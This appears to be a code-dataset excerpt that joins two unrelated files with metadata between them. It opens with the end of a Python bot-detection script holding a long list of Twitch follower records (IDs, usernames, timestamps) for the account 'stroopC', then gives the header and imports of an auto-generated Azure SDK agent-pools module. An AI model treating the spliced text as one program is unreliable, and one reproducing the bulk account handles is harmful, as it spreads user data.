'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:27Z'}, {'from_id': '248378934', 'from_name': 'superarcades', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485549328', 'from_name': 'Waterfallygu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244495726', 'from_name': 'bagel411u', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248328378', 'from_name': 'gametime3010', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248364051', 'from_name': 'aliciawinsf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248359180', 'from_name': 'g4non_gamesynb', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485526001', 'from_name': 'personCreepy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492130937', 'from_name': 'Oceanwxe', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485546684', 'from_name': 'slipChange', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244419280', 'from_name': 'andrewbraveh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244424551', 'from_name': 'shannaninaf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244431869', 'from_name': 'dncbry', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248292990', 'from_name': 'jelyfishtnaj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486328405', 'from_name': 'wheel0mk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248362790', 'from_name': 'orrsat', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492119347', 'from_name': 'ChalkDOG', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248379726', 'from_name': 'twizzj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248376966', 'from_name': 'rustycablemanh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248388551', 'from_name': 'xodalivel', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492164804', 'from_name': 'scarecrowmajestic', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244467811', 'from_name': 'ninja_with_no_l4b', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248317149', 'from_name': 'thechief11147', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244483235', 'from_name': 'rolandoellis812', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248311881', 'from_name': 'saifcameltvjq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485510472', 'from_name': 'fatherqSv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492122207', 'from_name': 'donaldrabbitssHY', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492132639', 'from_name': 'Tankconsign', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248359111', 'from_name': 'petritlpl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244427864', 'from_name': 'cyborgangelo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248344716', 'from_name': 'curvyllamah', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248353925', 'from_name': 'thi3n6', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492142555', 'from_name': 'Morninghdo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486318313', 'from_name': 'cherryproud97', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322390', 'from_name': 'monthunequaled', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244484704', 'from_name': 'daddydimmutvs', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244441903', 'from_name': 'gspotdotag', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244412995', 'from_name': 'coollermx', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248374317', 'from_name': 'wetforjesuso', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248311777', 'from_name': 'proudamericans5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248386769', 'from_name': 'versutax5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248340994', 'from_name': 'noelmiller1', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485552626', 'from_name': 'gladePatientvsq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '479451818', 'from_name': 'debt403', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248293118', 'from_name': 'realbambamg', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248322110', 'from_name': 'antdude92y', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336316', 'from_name': 'hexybi', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485623475', 'from_name': 'dustAutumn173', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248364710', 'from_name': 'thorw8', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492141393', 'from_name': 'turngwq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485564335', 'from_name': 'ShockJasone0t', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492135828', 'from_name': 'frogr00', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492108297', 'from_name': 'bedroomzip', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244485205', 'from_name': 'pocketstreamh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244395838', 'from_name': 'terasuhikarir', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248393835', 'from_name': 'deujnaan', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244427885', 'from_name': 'smkgaming053', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248357784', 'from_name': 'thatchickparkergo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336362', 'from_name': 'msteamkksk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492161018', 'from_name': 'Betrayportervq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244432096', 'from_name': 'auzyristv2', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492102128', 'from_name': 'Realizesnowdiw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248387137', 'from_name': 'lutzemai0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492138829', 'from_name': 'DistanceHeady', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244419834', 'from_name': 'teawrexg', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248397108', 'from_name': 'sly3r_jl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248335718', 'from_name': 'giusc7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492120767', 'from_name': 'Treescm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248290727', 'from_name': 'coccoq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485630624', 'from_name': 'birdjosephpgr', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322061', 'from_name': 'sneeze92', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248407434', 'from_name': 'gerbrownya', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248378910', 'from_name': 'gotshadow5', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244439257', 'from_name': 'midas_666q', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492169445', 'from_name': 'friendslinda', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248291773', 'from_name': 'lvpes2f', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248342578', 'from_name': 'texcubsfo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485613429', 'from_name': 'Playbeefsos', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492119948', 'from_name': 'jefflgl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244465629', 'from_name': 'manyrinc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244439380', 'from_name': 'beamtwitchu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486325653', 'from_name': 'plotvrk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248403462', 'from_name': 'b_u_l_o_c_h_k_aa', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492111083', 'from_name': 'airport827', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248379761', 'from_name': 'laquetuphj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492132911', 'from_name': 'WomenVex', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244444954', 'from_name': 'ubisoftbrasilb', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244409009', 'from_name': 'pondernstreamj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244397567', 'from_name': 'omar2f', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485630889', 'from_name': 'Lacebog', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248283868', 'from_name': 'vizfv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248319208', 'from_name': 'senct1', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244445224', 'from_name': 'stereonlinexq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486324311', 'from_name': 'daughterulx', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248379675', 'from_name': 'krakantas6r', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486315268', 'from_name': 'incomexsk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492143548', 'from_name': 'societyun', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322770', 'from_name': 'guidelqe', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492141056', 'from_name': 'baitrjc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248360693', 'from_name': 'yourprincesskw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486329023', 'from_name': 'reasonuJB', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248402128', 'from_name': 'gumdropstsm8', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486319932', 'from_name': 'coughcurrentGOMER', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336394', 'from_name': 'hockamskz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '479445682', 'from_name': 'mariaxjn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485556564', 'from_name': 'truckss0g', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244393167', 'from_name': 'giftmyraaf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492145328', 'from_name': 'knowledgeableApplianceswc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492130364', 'from_name': 'meadow790', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248355491', 'from_name': 'shp_tvdk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244399846', 'from_name': 'seals311g', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486324576', 'from_name': 'quietRuthless', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485521672', 'from_name': 'Denysleetrar', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485630110', 'from_name': 'cushion201', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485516406', 'from_name': 'Ronaldxfy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244487549', 'from_name': 'thefuncannon7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248294219', 'from_name': 'fooyam', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248402484', 'from_name': 'madqfrogh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485613809', 'from_name': 'cattlewOK', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485610899', 'from_name': 'Watch0lx', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486326677', 'from_name': 'sense0cc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492106738', 'from_name': 'jellyfishwfz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248378837', 'from_name': 'taylorreneea', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485520287', 'from_name': 'waterfallDarkooj', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492160281', 'from_name': 'middletjz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244415239', 'from_name': 'customstoriesp', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492104393', 'from_name': 'busysidewalkvll', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248281727', 'from_name': 'trihexdn', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248365147', 'from_name': 'dota2ti_ru_33', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244438241', 'from_name': 'brolynhofgcda', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248335646', 'from_name': 'dreads3b', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486322790', 'from_name': 'ronaldWildflower', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492155161', 'from_name': 'BirdsNaN', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248336342', 'from_name': 'guillermordzwa', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248410146', 'from_name': 'thebubbaarmy2', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248300233', 'from_name': 'puppersm', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244497630', 'from_name': 'anthonycaliber7', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492155055', 'from_name': 'fork589', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248393987', 'from_name': 'loke921', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248357761', 'from_name': '24kbrownmagics', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248361340', 'from_name': 'taymool', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248361300', 'from_name': 'worrun_tv8', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248393897', 'from_name': 'mrmacavityu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244392136', 'from_name': 'taerssi', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248349316', 'from_name': 'dota2ti_ru_3od', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '492167799', 'from_name': 'Statement38', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248338213', 'from_name': 'ilovemundays0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244388512', 'from_name': 'cyrustwob', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485578588', 'from_name': 'creature891', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '486328855', 'from_name': 'turndog', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248378133', 'from_name': 'diovanakoniw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485579923', 'from_name': 'noisehf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244439565', 'from_name': 'kutcherlolmw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248362319', 'from_name': 'zombsowu', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '244470398', 'from_name': 'hotformw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248347689', 'from_name': 'gale_adeladey', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248354795', 'from_name': 'd3th_c', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248361424', 'from_name': 'z4mmpam', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '248358913', 'from_name': 'alinefoxp', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:26Z'}, {'from_id': '485627670', 'from_name': 'surprisequickest', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248308308', 'from_name': 'otzdarvaml', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244482858', 'from_name': 'napostelw2', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485630893', 'from_name': 'basecrt', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485524263', 'from_name': 'Firejhv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '486316712', 'from_name': 'Furniturexvd', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492148973', 'from_name': 'achiever824', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244405299', 'from_name': 'mayanastreamy', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492161324', 'from_name': 'watchOptimize', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '486323148', 'from_name': 'Humiliatechickenswgw', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485522674', 'from_name': 'butterflyomo', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248397942', 'from_name': 'myfreshgamesz', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248403312', 'from_name': 'h0lydivaqf', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244405681', 'from_name': 'gunnermaniacc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248385299', 'from_name': 'billyiiiaxteps', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248397320', 'from_name': 'bourakkkkh', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '479449860', 'from_name': 'yokenn0', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244445037', 'from_name': 'casinorockstarc', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244465315', 'from_name': 'diehahnl', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244412172', 'from_name': 'bricegamingzoneim', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '485575178', 'from_name': 'bellshjv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492135858', 'from_name': 'Jewel693', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '492125073', 'from_name': 'Sistersskk', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248408202', 'from_name': 'fettmastaxq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '248385799', 'from_name': 'daspdcdv', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}, {'from_id': '244465426', 'from_name': 'jokeronestvq', 'to_id': '106071345', 'to_name': 'stroopC', 'followed_at': '2020-04-11T03:52:25Z'}]
sanitized_foll_uids = bot_det.sanitize_foll_list(sample_foll_list)
print(f'Length of sanitized list: {len(sanitized_foll_uids)}')
print(f'Sanitized uids:\n {sanitized_foll_uids}')
if __name__ == "__main__":
main()
| 356.55814 | 41,059 | 0.657949 |
2b0efca8fd68b4a70eeabb2396ae827a6467d6dc | 30,148 | py | Python | src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2022_01_02_preview/aio/operations/_agent_pools_operations.py | zjpjack/azure-cli-extensions | 17dd637317633ea7984e168900bdf4e62c265096 | [
"MIT"
] | 1 | 2022-03-09T08:59:13.000Z | 2022-03-09T08:59:13.000Z | src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2022_01_02_preview/aio/operations/_agent_pools_operations.py | zjpjack/azure-cli-extensions | 17dd637317633ea7984e168900bdf4e62c265096 | [
"MIT"
] | null | null | null | src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2022_01_02_preview/aio/operations/_agent_pools_operations.py | zjpjack/azure-cli-extensions | 17dd637317633ea7984e168900bdf4e62c265096 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
